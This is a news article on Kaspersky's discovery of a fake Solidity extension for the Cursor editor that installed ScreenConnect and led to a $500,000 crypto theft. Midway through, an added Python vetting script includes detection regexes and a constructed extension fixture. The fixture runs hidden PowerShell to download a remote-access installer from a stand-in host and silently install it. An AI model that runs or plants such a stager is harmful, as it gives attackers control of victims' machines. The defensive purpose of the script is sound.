Crypto Gone Cursor: Kaspersky Finds $500K Heist Hidden in Phony Code Extension

Kaspersky researchers have uncovered a sophisticated crypto heist that siphoned off $500,000 worth of digital assets by luring developers into downloading a malicious Visual Studio Code extension masquerading as a Solidity tool.

The cybersecurity firm’s Global Research and Analysis Team (GReAT) revealed that the attack targeted Cursor, a development environment built on top of the popular VS Code platform, which incorporates AI-assisted coding features.

The perpetrators abused the Open VSX extension registry, the marketplace Cursor draws its extensions from instead of Microsoft's, by uploading fraudulent packages that claimed to support Solidity, the primary language used in Ethereum smart contract development.

Instead of providing any real development functionality, the malicious extensions quietly fetched and installed ScreenConnect, a legitimate remote access tool frequently abused by attackers, which handed the threat actors full control of the victim's machine.

According to Kaspersky, the scam came to light after a Russian blockchain developer reached out for help during an incident response.

The developer had unknowingly installed one of the trojanized packages, which ultimately allowed hackers to gain access to his crypto wallets and drain half a million dollars in assets.

The attackers gamed Open VSX search ranking by artificially inflating the download count of their malicious package, which stood at more than 54,000 installs at the time of the theft.

The higher ranking tricked developers into choosing the compromised extension over the legitimate one, despite its lack of documentation and real functionality.

With that remote access in place, the attackers deployed the Quasar backdoor and a stealer capable of exfiltrating data from browsers, email clients, and crypto wallets, including highly sensitive seed phrases.

Even after Kaspersky had the malicious package removed from the registry, the attackers returned and reposted it with an even more inflated download count, this time exceeding 2 million installs, compared with the legitimate package's 61,000.

“This attack highlights how even skilled developers working in the blockchain space can fall victim to deceptively crafted malware,” said Georgy Kucherin, a researcher with Kaspersky GReAT.

Kaspersky noted that the same group behind the fake Solidity extension also released a malicious NPM package named “solsafe” and other fraudulent VS Code extensions including “solaibot,” “among-eth,” and the oddly named “blankebesxstnion.”

All of these extensions followed a similar attack pattern and have since been removed from their respective repositories.

Experts warn that the open-source ecosystem is increasingly vulnerable to manipulation, particularly as developers rely more heavily on public code libraries and community tools.

Kaspersky emphasized that spotting compromised open-source packages with the naked eye is no longer feasible, even for seasoned programmers.

To mitigate such risks, the firm recommends using monitoring solutions to flag threats in open-source components and regularly conducting compromise assessments to detect intrusions early.

They also advise verifying the credibility of package maintainers by checking for detailed documentation, regular updates, and an active history of issue tracking.

Staying informed on emerging threats through security advisories and bulletins is also critical in a rapidly evolving threat landscape.
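One way to turn those recommendations into a repeatable check, as an added example that is not Kaspersky's or Open VSX's code: it scores a registry entry on the provenance signals named above (documentation, release history, a linked repository, a verified publisher), refuses to let a download counter decide between two same-named packages, because the counter is exactly what was padded in this case, and greps an unpacked extension bundle for the download-and-execute behaviour described earlier, such as PowerShell fetching a remote-access installer. The JSON field names are assumed to mirror the Open VSX registry API; the download-rate threshold, the two registry records, both extension sources, the vendor names and the example.invalid URLs are all constructed for illustration.

```python
"""Vet an editor extension before trusting it: registry-metadata plausibility,
provenance-based choice between same-named packages, and a static scan of the
unpacked bundle for download-and-execute behaviour.
Added example for this page, not Kaspersky's or Open VSX's code. Field names
mirror the Open VSX registry JSON (assumption); all data below is constructed."""
from __future__ import annotations

import re
from datetime import datetime, timezone

# Signals worth grepping for in a bundle that claims to be a language tool: PowerShell
# fetching something, a hidden window, a remote-access client, a fetched binary spawned.
SUSPICIOUS_PATTERNS = {
    "powershell_download": re.compile(
        r"(?i)powershell[^\n]{0,200}(Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b|\birm\b)"),
    "hidden_window": re.compile(r"(?i)-windowstyle\s+hidden|\s-w\s+hidden"),
    "remote_access_tool": re.compile(r"(?i)screenconnect|connectwise|anydesk"),
    "spawn_fetched_binary": re.compile(r"(?i)child_process[\s\S]{0,400}?\.(exe|msi|ps1|bat)\b"),
}

# Assumed cut-off: a package with at most two releases pulling more than this many
# downloads per day of its lifetime is treated as having a padded counter. Tune locally.
MAX_PLAUSIBLE_DOWNLOADS_PER_DAY = 2000


def assess_metadata(meta: dict, now: datetime) -> list[str]:
    """Return human-readable red flags for one registry entry (empty list = clean)."""
    published = datetime.fromisoformat(meta["timestamp"].replace("Z", "+00:00"))
    age_days = max((now - published).days, 1)
    downloads = meta.get("downloadCount", 0)
    versions = len(meta.get("allVersions", {}))
    findings = []
    if versions <= 2 and downloads / age_days > MAX_PLAUSIBLE_DOWNLOADS_PER_DAY:
        findings.append(f"implausible popularity: {downloads} downloads in "
                        f"{age_days} day(s) across {versions} version(s)")
    if "readme" not in meta.get("files", {}):
        findings.append("no README published")
    if not meta.get("repository"):
        findings.append("no source repository linked")
    if not meta.get("verified", False):
        findings.append("publisher namespace not verified")
    return findings


def choose_by_provenance(candidates: list[dict], now: datetime) -> dict:
    """Among same-named extensions prefer fewest red flags, then longest release
    history; downloadCount is ignored on purpose because an attacker can pad it."""
    return min(candidates, key=lambda m: (len(assess_metadata(m, now)),
                                          -len(m.get("allVersions", {}))))


def scan_extension_source(files: dict[str, str]) -> list[str]:
    """Static grep over unpacked .vsix contents; returns 'path: signal' hits."""
    return [f"{path}: {label}"
            for path, text in files.items()
            for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]


NOW = datetime(2025, 7, 1, tzinfo=timezone.utc)  # fixed clock so the run is reproducible

ESTABLISHED = {  # constructed: long-lived, documented, verified namespace
    "namespace": "vendor-a", "name": "solidity", "displayName": "Solidity",
    "timestamp": "2024-01-15T10:00:00Z", "downloadCount": 61000, "verified": True,
    "repository": "https://example.invalid/vendor-a/solidity",
    "files": {"download": "x", "readme": "x", "license": "x"},
    "allVersions": {"0.0.1": "x", "0.1.0": "x", "0.2.0": "x", "0.3.0": "x"},
}
LOOKALIKE = {  # constructed: days old, one release, no docs, padded counter
    "namespace": "vendor-b", "name": "solidity-language", "displayName": "Solidity",
    "timestamp": "2025-06-28T10:00:00Z", "downloadCount": 54000, "verified": False,
    "repository": "", "files": {"download": "x"}, "allVersions": {"1.0.0": "x"},
}

MALICIOUS_BUNDLE = {  # constructed stand-in: no language features, only a stager
    "extension.js": r'''const { exec } = require("child_process");
function activate() {
  exec('powershell -WindowStyle Hidden -Command "Invoke-WebRequest https://example.invalid/ScreenConnect.ClientSetup.msi -OutFile $env:TEMP\\sc.msi; Start-Process msiexec -ArgumentList /i,$env:TEMP\\sc.msi,/qn"');
}
module.exports = { activate };
''',
}
BENIGN_BUNDLE = {  # constructed: what a genuine language extension's entry point looks like
    "extension.js": r'''const { LanguageClient } = require("vscode-languageclient/node");
function activate(context) {
  const client = new LanguageClient("solidity", "Solidity Language Server",
    { command: context.asAbsolutePath("server/solidity-ls.js") },
    { documentSelector: [{ language: "solidity" }] });
  context.subscriptions.push(client.start());
}
module.exports = { activate };
''',
}

if __name__ == "__main__":
    for label, meta in (("established", ESTABLISHED), ("lookalike", LOOKALIKE)):
        print(f"{label}: {assess_metadata(meta, NOW) or 'no red flags'}")
    print("pick:", choose_by_provenance([LOOKALIKE, ESTABLISHED], NOW)["namespace"])
    print("malicious bundle:", scan_extension_source(MALICIOUS_BUNDLE))
    print("benign bundle:", scan_extension_source(BENIGN_BUNDLE))
```

Run against a real candidate, the registry record comes from the Open VSX API and the bundle from unzipping the downloaded .vsix; the string patterns are deliberately crude, since the point is that an extension advertised as a Solidity tool has no business spawning PowerShell or staging a remote-access client at all, so a single hit is reason enough not to install it.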

While the attack is alarming, it is far from an isolated incident in the crypto development world, where everything from browser plug-ins to Discord channels has become a hotspot for social engineering and digital heists.

As the lines between development tools and attack vectors continue to blur, the golden rule for coders may now be: trust, but verify—then verify again.

For now, it seems the only thing more volatile than crypto prices is the extension marketplace meant to support them.

Discover more from TBC News